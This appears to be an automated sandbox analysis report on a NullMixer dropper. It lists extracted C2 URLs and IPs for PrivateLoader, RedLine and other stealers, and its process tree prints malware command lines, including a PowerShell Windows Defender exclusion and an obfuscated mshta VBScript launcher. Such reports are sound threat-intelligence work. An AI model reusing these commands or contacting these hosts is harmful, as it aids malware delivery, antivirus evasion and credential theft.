10Analysis
-
max time kernel
149s -
max time network
166s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64 arch:x86 image:win7-20240903-en locale:en-us os:windows7-x64 system -
submitted
04-11-2024 23:53
Behavioral task
behavioral1
Sample
01a53007f9b19d8ae4f12cc75bafcbef064f75d3a4b31b347b334a2d30558d68.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
01a53007f9b19d8ae4f12cc75bafcbef064f75d3a4b31b347b334a2d30558d68.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
02ca2b5bb774890c50950ad93becc2851bac8d04c35464dad4854088c5db4135.exe
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
02ca2b5bb774890c50950ad93becc2851bac8d04c35464dad4854088c5db4135.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
setup_installer.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
setup_installer.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
0d69cafe700a952a621c9b5981504e30c939c3d6cc34452691fce67b2eb6c1cd.exe
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
0d69cafe700a952a621c9b5981504e30c939c3d6cc34452691fce67b2eb6c1cd.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
setup_installer.exe
Resource
win7-20240729-en
Behavioral task
behavioral12
Sample
setup_installer.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
0df647f0a2aa6c1aa1ec9426b9ef7c23eb6394f3ed29fbbdd0e9e228d24510bc.exe
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
0df647f0a2aa6c1aa1ec9426b9ef7c23eb6394f3ed29fbbdd0e9e228d24510bc.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
setup_installer.exe
Resource
win7-20241010-en
Behavioral task
behavioral16
Sample
setup_installer.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
1df367eead22695952cce5131891dfec5c479da37cb3dac0403015ebb785032c.exe
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
1df367eead22695952cce5131891dfec5c479da37cb3dac0403015ebb785032c.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
setup_installer.exe
Resource
win7-20240708-en
Behavioral task
behavioral20
Sample
setup_installer.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral21
Sample
1e083736aeca35b40f45693442d37466fa7b61ab36b2cebc2a49cb8c8492a433.exe
Resource
win7-20240903-en
Behavioral task
behavioral22
Sample
1e083736aeca35b40f45693442d37466fa7b61ab36b2cebc2a49cb8c8492a433.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral23
Sample
1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe
Resource
win7-20240903-en
Behavioral task
behavioral24
Sample
1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral25
Sample
2010009ff5b8b55fbcaa90318461a1b5b69ef6c8fd32ac279e81a10844d57859.exe
Resource
win7-20240729-en
Behavioral task
behavioral26
Sample
2010009ff5b8b55fbcaa90318461a1b5b69ef6c8fd32ac279e81a10844d57859.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral27
Sample
243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe
Resource
win7-20241010-en
Behavioral task
behavioral28
Sample
243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral29
Sample
2d63a14e4ab37be8d0eee3d87959e3a0ef972d07411c136ecf2f1ac4191a701a.exe
Resource
win7-20240903-en
Behavioral task
behavioral30
Sample
2d63a14e4ab37be8d0eee3d87959e3a0ef972d07411c136ecf2f1ac4191a701a.exe
Resource
win10v2004-20241007-en
General
-
Target
1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe
-
Size
7.1MB
-
MD5
2b01f663d5244764e8c2d164d3345fd6
-
SHA1
2b0dfcc018a5da0f140352bd114fb0f5e9abdfc3
-
SHA256
1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d
-
SHA512
2c7dd219673800320e3432ff6d8d2e5c2c3ae60a5f5960097d16ff79f385186ce13a81ea5a2b3d17652161d55ea552712f73d2d154b377fa74ec10043469dab4
-
SSDEEP
196608:x1LUCg3xjX8jOOU62TdXIGVlgJZhNSJWSCumPm3B:xNdgVMjRD2TCWler32PB
Malware Config
Extracted
nullmixer
http://mooorni.xyz/
Extracted
privateloader
http://45.133.1.107/server.txt
pastebin.com/raw/A7dSG1te
http://wfsdragon.ru/api/setStats.php
51.178.186.149
Extracted
socelars
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.znsjis.top/
Extracted
redline
fuck1
135.181.129.119:4805
-
auth_value
b69102cdbd4afe2d3159f88fb6dac731
Extracted
redline
media18
91.121.67.60:2151
-
auth_value
e37d5065561884bb54c8ed1baa6de446
Extracted
gcleaner
ppp-gl.biz
45.9.20.13
Signatures
-
Detect Fabookie payload 1 IoCs
resource yara_rule behavioral23/files/0x000500000001a4e2-91.dat family_fabookie -
Fabookie family
-
Gcleaner family
-
Nullmixer family
-
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
Onlylogger family
-
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
Privateloader family
-
Raccoon Stealer V1 payload 1 IoCs
resource yara_rule behavioral23/memory/2860-239-0x0000000000400000-0x00000000016FB000-memory.dmp family_raccoon_v1 -
Raccoon family
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 10 IoCs
resource yara_rule behavioral23/memory/2564-215-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral23/memory/2568-225-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral23/memory/2568-227-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral23/memory/2568-226-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral23/memory/2568-222-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral23/memory/2568-220-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral23/memory/2564-213-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral23/memory/2564-209-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral23/memory/2564-207-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral23/memory/2564-212-0x0000000000400000-0x0000000000422000-memory.dmp family_redline -
Redline family
-
SectopRAT payload 10 IoCs
resource yara_rule behavioral23/memory/2564-215-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral23/memory/2568-225-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral23/memory/2568-227-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral23/memory/2568-226-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral23/memory/2568-222-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral23/memory/2568-220-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral23/memory/2564-213-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral23/memory/2564-209-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral23/memory/2564-207-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral23/memory/2564-212-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat -
Sectoprat family
-
Socelars family
-
Socelars payload 1 IoCs
resource yara_rule behavioral23/files/0x000500000001a4f9-85.dat family_socelars -
Vidar family
-
OnlyLogger payload 1 IoCs
resource yara_rule behavioral23/memory/1152-240-0x0000000000400000-0x0000000002DBD000-memory.dmp family_onlylogger -
Vidar Stealer 1 IoCs
resource yara_rule behavioral23/memory/2248-243-0x0000000000400000-0x0000000002E10000-memory.dmp family_vidar -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
pid Process 2844 powershell.exe -
resource yara_rule behavioral23/files/0x000500000001a4c8-58.dat aspack_v212_v242 behavioral23/files/0x000500000001a4b9-59.dat aspack_v212_v242 behavioral23/files/0x000500000001a4d4-65.dat aspack_v212_v242 -
Executes dropped EXE 26 IoCs
pid Process 2752 setup_install.exe 2720 Mon2009d34d832dfd1d9.exe 2824 Mon20e7747f4ca9880.exe 2008 Mon200820e9da.exe 2860 Mon20b3dfc29da.exe 2516 Mon20c36d61c41847b17.exe 2312 Mon2024c1cb997.exe 768 Mon209df24d5e8f7.exe 2488 Mon20b09e42933548639.exe 2260 Mon200cb51003361.exe 1152 Mon2050daa466f6f.exe 2372 Mon203223fed8a4266c.exe 2140 Mon200cb51003361.tmp 1532 Mon206e4c938239.exe 1460 Mon204858e151.exe 2248 Mon2092b01a62c73.exe 956 Mon201cb4c63ce4.exe 292 Mon201629b9d021e.exe 276 Mon200cb51003361.exe 2756 Mon200cb51003361.tmp 3028 O5lIe.exE 2100 kPBhgOaGQk.exe 2788 Mon209df24d5e8f7.exe 2564 Mon206e4c938239.exe 2568 Mon204858e151.exe 2932 f782368.exe -
Loads dropped DLL 64 IoCs
pid Process 1952 1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe 1952 1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe 1952 1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe 2752 setup_install.exe 2752 setup_install.exe 2752 setup_install.exe 2752 setup_install.exe 2752 setup_install.exe 2752 setup_install.exe 2752 setup_install.exe 2752 setup_install.exe 3008 cmd.exe 2028 cmd.exe 1996 cmd.exe 2028 cmd.exe 2332 cmd.exe 692 cmd.exe 2720 Mon2009d34d832dfd1d9.exe 2720 Mon2009d34d832dfd1d9.exe 692 cmd.exe 1992 cmd.exe 680 cmd.exe 2824 Mon20e7747f4ca9880.exe 2824 Mon20e7747f4ca9880.exe 2992 cmd.exe 2008 Mon200820e9da.exe 2008 Mon200820e9da.exe 2860 Mon20b3dfc29da.exe 2860 Mon20b3dfc29da.exe 1684 cmd.exe 2516 Mon20c36d61c41847b17.exe 2516 Mon20c36d61c41847b17.exe 2312 Mon2024c1cb997.exe 2312 Mon2024c1cb997.exe 768 Mon209df24d5e8f7.exe 768 Mon209df24d5e8f7.exe 1092 cmd.exe 1776 cmd.exe 1776 cmd.exe 2260 Mon200cb51003361.exe 2260 Mon200cb51003361.exe 2488 Mon20b09e42933548639.exe 2488 Mon20b09e42933548639.exe 1152 Mon2050daa466f6f.exe 1152 Mon2050daa466f6f.exe 2260 Mon200cb51003361.exe 2372 Mon203223fed8a4266c.exe 2372 Mon203223fed8a4266c.exe 1464 cmd.exe 1464 cmd.exe 980 cmd.exe 2688 cmd.exe 980 cmd.exe 2688 cmd.exe 1532 Mon206e4c938239.exe 1532 Mon206e4c938239.exe 1460 Mon204858e151.exe 1460 Mon204858e151.exe 2248 Mon2092b01a62c73.exe 2248 Mon2092b01a62c73.exe 2020 cmd.exe 2304 cmd.exe 956 Mon201cb4c63ce4.exe 956 Mon201cb4c63ce4.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials and other sensitive information.
-
Blocklisted process makes network request 6 IoCs
flow pid Process 60 1724 msiexec.exe 73 1724 msiexec.exe 82 1724 msiexec.exe 84 1724 msiexec.exe 86 1724 msiexec.exe 88 1724 msiexec.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
flow ioc 41 pastebin.com 50 iplogger.org 51 iplogger.org 25 iplogger.org 26 iplogger.org 39 pastebin.com 40 pastebin.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 19 ip-api.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 768 set thread context of 2788 768 Mon209df24d5e8f7.exe 85 PID 1532 set thread context of 2564 1532 Mon206e4c938239.exe 77 PID 1460 set thread context of 2568 1460 Mon204858e151.exe 78 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
pid pid_target Process procid_target 1144 2008 WerFault.exe 55 2912 2752 WerFault.exe 31 1528 2248 WerFault.exe 64 1552 2932 WerFault.exe 112 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon200cb51003361.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon203223fed8a4266c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon200cb51003361.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon20c36d61c41847b17.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon2024c1cb997.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon20e7747f4ca9880.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon200cb51003361.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon204858e151.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon201cb4c63ce4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon2050daa466f6f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kPBhgOaGQk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 
1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon2009d34d832dfd1d9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon206e4c938239.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon209df24d5e8f7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon20b3dfc29da.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon206e4c938239.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup_install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language O5lIe.exE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon2092b01a62c73.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon200cb51003361.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 
Mon20b09e42933548639.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon200820e9da.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon209df24d5e8f7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon204858e151.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f782368.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Kills process with taskkill 3 IoCs
pid Process 2500 taskkill.exe 2712 taskkill.exe 952 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2844 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 2756 Mon200cb51003361.tmp 1152 Mon2050daa466f6f.exe -
Suspicious use of AdjustPrivilegeToken 39 IoCs
description pid Process Token: SeCreateTokenPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeAssignPrimaryTokenPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeLockMemoryPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeIncreaseQuotaPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeMachineAccountPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeTcbPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeSecurityPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeTakeOwnershipPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeLoadDriverPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeSystemProfilePrivilege 2516 Mon20c36d61c41847b17.exe Token: SeSystemtimePrivilege 2516 Mon20c36d61c41847b17.exe Token: SeProfSingleProcessPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeIncBasePriorityPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeCreatePagefilePrivilege 2516 Mon20c36d61c41847b17.exe Token: SeCreatePermanentPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeBackupPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeRestorePrivilege 2516 Mon20c36d61c41847b17.exe Token: SeShutdownPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeDebugPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeAuditPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeSystemEnvironmentPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeChangeNotifyPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeRemoteShutdownPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeUndockPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeSyncAgentPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeEnableDelegationPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeManageVolumePrivilege 2516 Mon20c36d61c41847b17.exe Token: SeImpersonatePrivilege 2516 Mon20c36d61c41847b17.exe Token: SeCreateGlobalPrivilege 2516 Mon20c36d61c41847b17.exe Token: 31 2516 Mon20c36d61c41847b17.exe Token: 32 2516 Mon20c36d61c41847b17.exe Token: 33 2516 Mon20c36d61c41847b17.exe Token: 34 2516 Mon20c36d61c41847b17.exe Token: 35 2516 Mon20c36d61c41847b17.exe Token: SeDebugPrivilege 2720 
Mon2009d34d832dfd1d9.exe Token: SeDebugPrivilege 2844 powershell.exe Token: SeDebugPrivilege 2500 taskkill.exe Token: SeDebugPrivilege 2712 taskkill.exe Token: SeDebugPrivilege 952 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1952 wrote to memory of 2752 1952 1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe 31 PID 1952 wrote to memory of 2752 1952 1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe 31 PID 1952 wrote to memory of 2752 1952 1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe 31 PID 1952 wrote to memory of 2752 1952 1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe 31 PID 1952 wrote to memory of 2752 1952 1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe 31 PID 1952 wrote to memory of 2752 1952 1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe 31 PID 1952 wrote to memory of 2752 1952 1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe 31 PID 2752 wrote to memory of 2296 2752 setup_install.exe 33 PID 2752 wrote to memory of 2296 2752 setup_install.exe 33 PID 2752 wrote to memory of 2296 2752 setup_install.exe 33 PID 2752 wrote to memory of 2296 2752 setup_install.exe 33 PID 2752 wrote to memory of 2296 2752 setup_install.exe 33 PID 2752 wrote to memory of 2296 2752 setup_install.exe 33 PID 2752 wrote to memory of 2296 2752 setup_install.exe 33 PID 2752 wrote to memory of 2304 2752 setup_install.exe 34 PID 2752 wrote to memory of 2304 2752 setup_install.exe 34 PID 2752 wrote to memory of 2304 2752 setup_install.exe 34 PID 2752 wrote to memory of 2304 2752 setup_install.exe 34 PID 2752 wrote to memory of 2304 2752 setup_install.exe 34 PID 2752 wrote to memory of 2304 2752 setup_install.exe 34 PID 2752 wrote to memory of 2304 2752 setup_install.exe 34 PID 2752 wrote to memory of 2332 2752 setup_install.exe 35 PID 2752 wrote to memory of 2332 2752 setup_install.exe 35 PID 2752 wrote to memory of 2332 2752 setup_install.exe 35 PID 2752 wrote to memory of 2332 2752 setup_install.exe 35 PID 2752 wrote to memory of 2332 2752 setup_install.exe 35 PID 2752 wrote to memory of 2332 2752 setup_install.exe 35 PID 2752 
wrote to memory of 2332 2752 setup_install.exe 35 PID 2752 wrote to memory of 680 2752 setup_install.exe 36 PID 2752 wrote to memory of 680 2752 setup_install.exe 36 PID 2752 wrote to memory of 680 2752 setup_install.exe 36 PID 2752 wrote to memory of 680 2752 setup_install.exe 36 PID 2752 wrote to memory of 680 2752 setup_install.exe 36 PID 2752 wrote to memory of 680 2752 setup_install.exe 36 PID 2752 wrote to memory of 680 2752 setup_install.exe 36 PID 2752 wrote to memory of 1092 2752 setup_install.exe 37 PID 2752 wrote to memory of 1092 2752 setup_install.exe 37 PID 2752 wrote to memory of 1092 2752 setup_install.exe 37 PID 2752 wrote to memory of 1092 2752 setup_install.exe 37 PID 2752 wrote to memory of 1092 2752 setup_install.exe 37 PID 2752 wrote to memory of 1092 2752 setup_install.exe 37 PID 2752 wrote to memory of 1092 2752 setup_install.exe 37 PID 2752 wrote to memory of 980 2752 setup_install.exe 38 PID 2752 wrote to memory of 980 2752 setup_install.exe 38 PID 2752 wrote to memory of 980 2752 setup_install.exe 38 PID 2752 wrote to memory of 980 2752 setup_install.exe 38 PID 2752 wrote to memory of 980 2752 setup_install.exe 38 PID 2752 wrote to memory of 980 2752 setup_install.exe 38 PID 2752 wrote to memory of 980 2752 setup_install.exe 38 PID 2752 wrote to memory of 2028 2752 setup_install.exe 39 PID 2752 wrote to memory of 2028 2752 setup_install.exe 39 PID 2752 wrote to memory of 2028 2752 setup_install.exe 39 PID 2752 wrote to memory of 2028 2752 setup_install.exe 39 PID 2752 wrote to memory of 2028 2752 setup_install.exe 39 PID 2752 wrote to memory of 2028 2752 setup_install.exe 39 PID 2752 wrote to memory of 2028 2752 setup_install.exe 39 PID 2752 wrote to memory of 1464 2752 setup_install.exe 40 PID 2752 wrote to memory of 1464 2752 setup_install.exe 40 PID 2752 wrote to memory of 1464 2752 setup_install.exe 40 PID 2752 wrote to memory of 1464 2752 setup_install.exe 40 PID 2752 wrote to memory of 1464 2752 setup_install.exe 40 PID 2752 wrote 
to memory of 1464 2752 setup_install.exe 40 PID 2752 wrote to memory of 1464 2752 setup_install.exe 40 PID 2752 wrote to memory of 1684 2752 setup_install.exe 41
Processes
-
C:\Users\Admin\AppData\Local\Temp\1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe"C:\Users\Admin\AppData\Local\Temp\1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1952 -
C:\Users\Admin\AppData\Local\Temp\7zS0A7024F6\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS0A7024F6\setup_install.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"3⤵
- System Location Discovery: System Language Discovery
PID:2296 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2844
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon201cb4c63ce4.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2304 -
C:\Users\Admin\AppData\Local\Temp\7zS0A7024F6\Mon201cb4c63ce4.exeMon201cb4c63ce4.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:956 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCript:ClOsE ( cREateObjEct ( "WSCRiPt.SheLl").rUN( "C:\Windows\system32\cmd.exe /Q /R CoPY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS0A7024F6\Mon201cb4c63ce4.exe"" O5lIe.exE &&start O5lie.exe /p0vFkT3Hyul & If """" == """" for %u In ( ""C:\Users\Admin\AppData\Local\Temp\7zS0A7024F6\Mon201cb4c63ce4.exe"") do taskkill -f /iM ""%~nXu"" " ,0 , truE ) )5⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:1680 -
